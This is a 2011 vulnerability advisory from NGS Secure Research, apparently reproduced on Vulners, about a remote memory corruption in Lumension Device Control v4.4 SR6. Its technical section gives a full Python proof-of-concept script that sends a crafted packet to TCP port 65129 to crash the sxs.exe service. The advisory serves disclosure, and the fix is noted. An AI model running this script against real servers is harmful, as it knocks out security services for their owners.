Vulners
Lucene search
Lumension Device Control Memory Corruption
`=======
Summary
=======
Name: Lumension Device Control (formerly Sanctuary) remote memory corruption
Release Date: 24 August 2011
Reference: NGS00054
Discoverer: Andy Davis <[email protected]>
Vendor: Lumension
Vendor Reference:
Systems Affected: Lumension Device Control v4.4 SR6
Risk: High
Status: Published
========
TimeLine
========
Discovered: 3 March 2011
Released: 3 March 2011
Approved: 3 March 2011
Reported: 3 March 2011
Fixed: 24 May 2011
Published: 24 August 2011
===========
Description
===========
By sending a specially crafted packet to TCP port 65129 the sxs.exe service running on the Lumension application server terminates
=================
Technical Details
=================
A simple PoC is presented here:
#!/usr/local/bin/python
import sys
from socket import *
import os
if (len(sys.argv)!=2):
print "\n--------------------------------------------------"
print "Usage: %s <target IP>" % sys.argv[0]
print "--------------------------------------------------\n"
exit(0)
host=sys.argv[1]
port=65129
packet1 = "\xec\x02\x00\x00" #length of remaining packet
packet1 += "\xc9\x00\x00\x00" #some kind of packet ID?
#packet1 += "\x18\x00\x00\x00"
packet1 += "\x61\x61\x61\x61" #crash occurs here
packet1 += "\xc8\x02\x00\x00\xd4\xf8\x27\xe3\x51\xdf\xc9\x48\x82\xc3"
packet1 += "\xdb\x73\xbf\x42\xce\x77\xec\x00\x00\x00\x00\x00\x00\x00\x01\x00"
packet1 += "\x00\x00\x0d\xd8\x91\x32\x61\xf4\x43\xa1\xe1\x8e\x27\x68\x6d\xde"
packet1 += "\xbe\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x95\x00\x05\x01"
packet1 += "\x03\x00\x00\x03\x01\x10\x02\x00\x00\x00\x00\x00\x00\x00"
packet1 += "\x34\x2e\x34\x2e\x31\x34\x35\x32" #client version
packet1 += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet1 += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd6\x5e"
packet1 += "\xe0\x81\xdb\xd8\xcb\x01\xe4\x95\x45\xe1\xdb\xd8\xcb\x01\x7c\x99"
packet1 += "\x47\xbc\xdb\xd8\xcb\x01\xd6\xbc\xb0\x34\xdc\xd8\xcb\x01\x02\x00"
packet1 += "\x00\x00\x9c\x47\x57\x00\xd4\xf8\x27\xe3\x51\xdf\xc9\x48\x82\xc3"
packet1 += "\xdb\x73\xbf\x42\xce\x77\xec\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet1 += "\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
packet1 += "\xc0\xa8\x00\x6b" #client IP address
packet1 += "\xff\xff\xff\x00" #client subnet mask
packet1 += "\x61\x00\x63\x00\x65\x00\x72\x00\x2d\x00\x65\x00\x38\x00"
packet1 += "\x31\x00\x37\x00\x66\x00\x61\x00\x65\x00\x30\x00\x64\x00\x38\x00" # client hostname
packet1 += "\x00" * 480
packet1 += "\x00\x00\x40\xfc\xba\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80"
packet1 += "\x85\xcc\x23\x00\x00\x00\x80\xee\x36\x00\x93\x84\xde\x84\x02\x00"
packet1 += "\x00\x00\x00\x00\x00\x00"
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.send(packet1)
print s.recv(1024)
s.close()
===============
Fix Information
===============
This issue is addressed in SR7, which can be downloaded by registered customers at:
https://portal.lumension.com/
NGS Secure Research
http://www.ngssecure.com
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Aug 2011 00:00Current
0.3Low risk
Vulners AI Score0.3